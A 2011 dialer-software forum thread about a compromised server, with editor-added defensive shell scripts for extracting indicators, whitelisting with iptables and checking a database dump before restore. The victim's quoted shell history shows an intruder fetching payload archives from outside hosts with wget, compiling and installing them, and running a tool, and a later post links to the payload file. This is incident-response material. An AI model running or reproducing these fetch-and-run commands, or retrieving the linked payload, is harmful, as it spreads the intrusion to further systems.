Hacked ??

General and Support topics relating to ViciDialNow and GoAutoDial ISO installers

Postby gmcust3 » Fri Sep 16, 2011 3:08 pm

Suddenly I find that the few commands below were run on my server, MUST BE by some hackers. Now I have changed the root password, but what can be the implications of the commands below?



27 cd /etc/ppp
28 wget gsm-replica.com/allnoscan.tgz
29 tar zxvf allnoscan.tgz
30 cd aastra/
31 wget gsm-replica.com/fork.tgz
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
37 cd ..
38 screen
39 cd ../polycom/
40 cp ../aastra/bios.txt bios.txt
41 screen
42 cd /etc/ppp/aastra/
43 vi vuln
44 rm -rf vuln
45 cd ../polycom/
46 vi vuln
47 rm -rf vuln
48 exit
49 ./start b 4
50 wget http://fs03n3.sendspace.com/dl/8f286c2d ... cb4a6/4e70 f0222f326731/n2u07y/e.zip
51 unzip e.zip
52 mv e.txt bios.txt
53 ./start b 4
I see a folder named ppp under the etc folder. Can I delete it?
Last edited by gmcust3 on Fri Sep 16, 2011 3:12 pm, edited 1 time in total.
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm

Postby gmcust3 » Fri Sep 16, 2011 3:10 pm

Server was accessed from:

206.125.45.185

95.130.170.231
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm
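An added triage example (editor-written shell; not code from the post, VICIdial or GoAutoDial): it takes the history listing from the first post and the two source addresses from the follow-up, extracts the hosts the payloads were fetched from and every directory the intruder worked in, builds one grep pattern for the logs, and reports which of those directories still exist on the box. The history text is embedded exactly as printed in the post (the sendspace URL is truncated there and is kept that way), the attacker IPs are the ones reported, and the function names are my own.

```shell
#!/bin/bash
# Added example (editor-written; not code from the forum post, VICIdial or
# GoAutoDial): pull indicators out of a recovered shell history so the rest
# of the box, and the SSH/web/firewall logs, can be searched for them.
# HISTORY_SAMPLE is the listing from the post (line 50's URL is truncated by
# the forum and kept as printed); ATTACKER_IPS are the two reported sources.

HISTORY_SAMPLE='27 cd /etc/ppp
28 wget gsm-replica.com/allnoscan.tgz
29 tar zxvf allnoscan.tgz
30 cd aastra/
31 wget gsm-replica.com/fork.tgz
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
37 cd ..
38 screen
39 cd ../polycom/
40 cp ../aastra/bios.txt bios.txt
41 screen
42 cd /etc/ppp/aastra/
43 vi vuln
44 rm -rf vuln
45 cd ../polycom/
46 vi vuln
47 rm -rf vuln
48 exit
49 ./start b 4
50 wget http://fs03n3.sendspace.com/dl/8f286c2d ... cb4a6/4e70 f0222f326731/n2u07y/e.zip
51 unzip e.zip
52 mv e.txt bios.txt
53 ./start b 4'
ATTACKER_IPS='206.125.45.185 95.130.170.231'

# Drop the "NNN " prefix that the shell's history builtin prints.
strip_history_numbers() { sed -E 's/^[[:space:]]*[0-9]+[[:space:]]+//'; }

# Hosts that wget/curl fetched from: addresses to block, to look for in
# proxy/DNS logs, and to report as the payload sources.
fetch_hosts() {
    strip_history_numbers | awk '
        $1 == "wget" || $1 == "curl" {
            url = $2
            sub("^[a-z]+://", "", url)   # drop the scheme, if any
            sub("/.*$", "", url)         # keep only the host part
            print url
        }' | sort -u
}

# Collapse ".", ".." and empty components of an absolute path as plain text,
# so paths resolve even after the directories have been deleted.
normalize_path() {
    local input="$1" out="" part
    local IFS='/'
    for part in $input; do
        case "$part" in
            ''|'.') ;;
            '..')   out=${out%/*} ;;
            *)      out="$out/$part" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
}

# Replay every "cd" in order and print the set of directories the intruder
# worked in. Nesting from "screen"/"exit" is ignored; the set is what matters.
working_dirs() {
    local cwd="/" line target
    strip_history_numbers | while IFS= read -r line; do
        case "$line" in
            cd\ *) target=${line#cd } ;;
            *)     continue ;;
        esac
        case "$target" in
            /*) cwd=$(normalize_path "$target") ;;
            *)  cwd=$(normalize_path "$cwd/$target") ;;
        esac
        printf '%s\n' "$cwd"
    done | sort -u
}

# One egrep pattern of every indicator (fetched hosts plus the reported source
# IPs) for grepping /var/log/secure, the Apache logs and any firewall logs.
ioc_grep_pattern() {
    { printf '%s\n' "$HISTORY_SAMPLE" | fetch_hosts; printf '%s\n' $ATTACKER_IPS; } \
        | sed 's/\./\\./g' | paste -s -d '|' -
}

# Report which of the intruder's working directories still exist here; a
# PRESENT entry is evidence to preserve (tar it up) before the reinstall.
check_artifacts() {
    local d
    printf '%s\n' "$HISTORY_SAMPLE" | working_dirs | while IFS= read -r d; do
        if [ -e "$d" ]; then echo "PRESENT $d"; else echo "absent  $d"; fi
    done
}

echo "== payload hosts";    printf '%s\n' "$HISTORY_SAMPLE" | fetch_hosts
echo "== working dirs";     printf '%s\n' "$HISTORY_SAMPLE" | working_dirs
echo "== log grep pattern"; ioc_grep_pattern
echo "== on this box";      check_artifacts
```

Run it before touching anything: the PRESENT directories are evidence to copy off-box (with `ls -la` timestamps) before the reinstall, and the grep pattern goes over /var/log/secure, the Apache logs and any firewall logs to find the first login and whether the same addresses reached other boxes. Note also that `perl Makefile.PL; make; make install` installs into the system Perl library path, outside /etc/ppp, so deleting that folder alone would not remove everything that was added.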

Postby williamconley » Sat Sep 17, 2011 8:36 pm

32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
Wipe your system and reinstall. They have added software to your system, and that software could have done ANYTHING while running. You could have extra users, you could be running IP forwarding ... Backup, wipe, reinstall, lockdown, restore. iptables: whitelist access only.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)
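The lockdown and checks from the reply above, as an added example (editor-written shell; not the poster's, VICIdial's or GoAutoDial's code). It generates a whitelist-only iptables ruleset for the rebuilt box and runs two of the checks the reply names: UID-0 accounts other than root, and whether IP forwarding is switched on. The admin and carrier networks are placeholders (documentation address ranges), the RTP port range assumes Asterisk's default, and the function names are my own.

```shell
#!/bin/bash
# Added example (editor-written; not from the forum reply, VICIdial or
# GoAutoDial): the "iptables whitelist access only" lockdown for the rebuilt
# box, plus the two quick checks the reply names (extra users, IP forwarding).
# Assumptions: admin and carrier networks are passed as space-separated CIDRs
# (203.0.113.0/24 and 198.51.100.0/24 below are documentation ranges, not
# real addresses); RTP uses Asterisk's default 10000-20000/udp, which must
# match rtp.conf on the box.

# Print an iptables-restore ruleset: drop all inbound traffic except loopback,
# replies to connections the server opened, SSH and the web GUI from the
# admin networks, and SIP/RTP from the carrier networks. Everything else is
# logged (rate limited) and dropped by the chain policy.
render_whitelist_rules() {
    local admins="$1" carriers="$2" net
    echo '*filter'
    echo ':INPUT DROP [0:0]'
    echo ':FORWARD DROP [0:0]'
    echo ':OUTPUT ACCEPT [0:0]'
    echo '-A INPUT -i lo -j ACCEPT'
    echo '-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    for net in $admins; do
        echo "-A INPUT -s $net -p tcp -m multiport --dports 22,80,443 -j ACCEPT"
    done
    for net in $carriers; do
        echo "-A INPUT -s $net -p udp --dport 5060 -j ACCEPT"
        echo "-A INPUT -s $net -p udp --dport 10000:20000 -j ACCEPT"
    done
    echo '-A INPUT -m limit --limit 1/s -j LOG --log-prefix "INPUT-DROP: "'
    echo 'COMMIT'
}

# Accounts that are UID 0 without being "root": a classic leave-behind.
# Takes the passwd file to inspect, so a copy from the old disk can be checked.
rogue_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# True when the kernel forwards packets for other hosts, i.e. the dialer has
# been turned into a router/relay. The path argument exists for testing; the
# default is the live sysctl.
ip_forwarding_enabled() {
    [ "$(cat "${1:-/proc/sys/net/ipv4/ip_forward}" 2>/dev/null)" = "1" ]
}

# Stand-alone run: show the ruleset for example networks and run the checks.
echo "== whitelist ruleset (pipe into iptables-restore on the rebuilt box)"
render_whitelist_rules "203.0.113.0/24" "198.51.100.0/24"
echo "== UID-0 accounts other than root"
rogue_root_accounts /etc/passwd
if ip_forwarding_enabled; then
    echo "IP forwarding: ENABLED (unexpected on a dialer)"
else
    echo "IP forwarding: off"
fi
```

Apply the ruleset from the console (or with a scheduled `iptables -F` as a safety net) so a typo in the whitelist cannot lock you out, and add every agent network to the admin list, since agents need the web GUI and SIP/IAX as well. On the old disk, `netstat -tulpn` and `rpm -Va` will tell you what was listening and which packaged binaries were modified, but as the reply says, treat those answers as a starting point for the rebuild, not as a clean bill of health.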

Postby gmcust3 » Sat Sep 17, 2011 10:31 pm

Can I delete the PPP folder safely?

Here is the fork file:

http://www.4shared.com/file/gzoJb9Ne/fork.html
GoAutoDial CE
VERSION: 2.4-309a
BUILD: 110430-1642
No other software installed on the box.
I've read the manager manual.
gmcust3
 
Posts: 1148
Joined: Sat Oct 24, 2009 1:15 pm

Postby williamconley » Sat Sep 17, 2011 10:58 pm

The point from my earlier post is this:

Their software, once running, could have done ANYTHING. It could have installed a rootkit, it could have changed your TTY settings to make anything with the word "free" in it green ... seriously. Unless you find out what it did, anyone telling you that you can safely delete anything or ...? is "hoping" they are right, but the reality of the matter is that they logged into your system and ran an external application which they downloaded. If the app is still there, you could look it over. If it's an executable ... good luck with that. And remember they could have changed it after running it to cover their tracks.

Wipe it and start over (back up first!!!). Back up NOW. Especially your data.

Of course, you could just delete everything they created and "hope" ... but the results of that could be several thousand dollars in calls to australia on Wednesday at 4AM. In an hour.

And seriously, *I* have no intention of looking at something that someone like this uploaded into your server. I'm crazy, not ...
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Postby gardo » Mon Sep 19, 2011 3:00 pm

I agree with William. Do a clean reinstall. Safer and faster. :wink:
http://goautodial.com
Empowering the next generation contact centers
gardo
 
Posts: 1926
Joined: Fri Sep 15, 2006 10:24 am
Location: Manila, 1004

Postby williamconley » Mon Sep 19, 2011 5:00 pm

And I'm not saying fighting a virus isn't great sport ... but is it worth the risk and effort (both)?

10 years or so ago when most of the country (windows users anyway) got hit with that supervirus (ok, lots of places did), I got a heads-up call from a network admin that she had "a problem" with her network, and I should check ours, too. Turns out servers across the known universe were being hit. Her company called in "the pros", and my boss said "handle it, but it comes out of YOUR department's budget".

Her company's "pros" battled the virus, blew about $8000, lost that day's data, wiped all the workstations and servers clean and reinstalled all their software. Bear in mind that we both had Norton installed. And updated.

*I* on the other hand (after learning that when the pros began to try to delete files and fight the virus ... it began to delete data and essential system files!), did that thing many forget in that moment. I initiated a backup, and told everyone on the sales floor and admin offices to keep paper copies of everything today.

As soon as the backup completed, I broke our connection to the Net (pissed off everyone, of course, but since we didn't have VOIP, it was not a big deal).

As soon as business closed for the night, I did another backup, and once again pulled out the DAT tapes as soon as they were done for storage (hoping they would not be corrupt).

Then I shut off every computer in the office by pulling the plug, including the servers.

Then I turned on the net.

Then I booted every machine from a Live Desktop (Demo!) CD one at a time, starting with the domain controller ... and scrubbed every computer in the office with "Housecall" and every other virus checker I could find until each one scanned clean.

Then I loaded up the new virus rules into Norton (apparently there was a new version for some reason) ... and restored the data and immediately scanned again.

*Poof* no loss of servers or systems or $8000 (but I worked well into the morning). Nobody took a pay cut. (I got the next day off due to unconsciousness.)

You ready to try to do that without Norton or Housecall? There are rootkit detectors for Linux. It should only take a few hours. Maybe.

Or you can just back up your mysql data (text file, no virus) and reinstall, then restore your data.

Up to you, though. Obviously.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)
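The "back up your MySQL data as a text file" step above, as an added example (editor-written shell; not the poster's, VICIdial's or GoAutoDial's code). The caveat it handles: a `mysqldump --all-databases` file also contains the mysql privilege tables, so restoring it as-is on the clean install would recreate any database account the intruder added. The functions inspect a dump before it is restored and take a dump of the application database only. The sample dump and the `extra` account in it are constructed for the example, the database name asterisk is VICIdial's usual schema name, and mysqldump is assumed to find its credentials in ~/.my.cnf.

```shell
#!/bin/bash
# Added example (editor-written; not from the forum post, VICIdial or
# GoAutoDial): back the dialer's MySQL data up as the plain-text dump the
# reply suggests, but inspect the dump before restoring it. A mysqldump
# --all-databases file also carries the `mysql` privilege tables, so restoring
# it blindly brings back any MySQL account the intruder added. Assumptions:
# the application schema is VICIdial's usual "asterisk" database, credentials
# come from ~/.my.cnf, and DUMP_SAMPLE below is a constructed stand-in.

DUMP_SAMPLE=$(cat <<'EOF'
-- constructed sample in the shape mysqldump --all-databases produces
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `asterisk` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `asterisk`;
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `mysql`;
INSERT INTO `user` VALUES ('localhost','root','*HASH','Y'),('%','extra','*HASH','Y');
EOF
)

# Names of the databases a dump file would (re)create.
dump_databases() {
    sed -nE 's/^CREATE DATABASE .*`([^`]+)`.*/\1/p' "$1" | sort -u
}

# True when the dump would overwrite the privilege tables of the new install.
dump_restores_grant_tables() {
    grep -qE '^(USE `mysql`;|CREATE DATABASE .*`mysql`)' "$1"
}

# user@host pairs that the dump's copy of mysql.user would recreate. mysqldump
# emits one extended INSERT per table; host is the first column, user second.
dump_mysql_users() {
    awk -v q="'" '
        /^INSERT INTO `user` VALUES/ {
            sub(/^INSERT INTO `user` VALUES \(/, "")
            n = split($0, rows, /\),\(/)
            for (i = 1; i <= n; i++) {
                split(rows[i], f, ",")
                gsub(q, "", f[1]); gsub(q, "", f[2])
                print f[2] "@" f[1]
            }
        }' "$1" | sort -u
}

# Dump only the application database (no privilege tables) and record a
# checksum so the copy carried off-box can be verified before the restore.
backup_app_db() {
    local db="${1:-asterisk}"
    local out="${2:-/root/$db-$(date +%Y%m%d).sql}"
    mysqldump "$db" > "$out" && sha256sum "$out" > "$out.sha256" && echo "$out"
}

# Stand-alone run over the constructed sample.
tmp=$(mktemp); printf '%s\n' "$DUMP_SAMPLE" > "$tmp"
echo "databases in dump: $(dump_databases "$tmp" | paste -s -d ' ' -)"
if dump_restores_grant_tables "$tmp"; then
    echo "dump contains the mysql privilege tables; accounts it would restore:"
    dump_mysql_users "$tmp"
fi
rm -f "$tmp"
```

If an existing dump lists accounts you do not recognise, do not restore the mysql database from it: load only the application database on the clean box and recreate the application's own MySQL user with a fresh `GRANT`, then verify the checksum of the .sql file before and after moving it.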

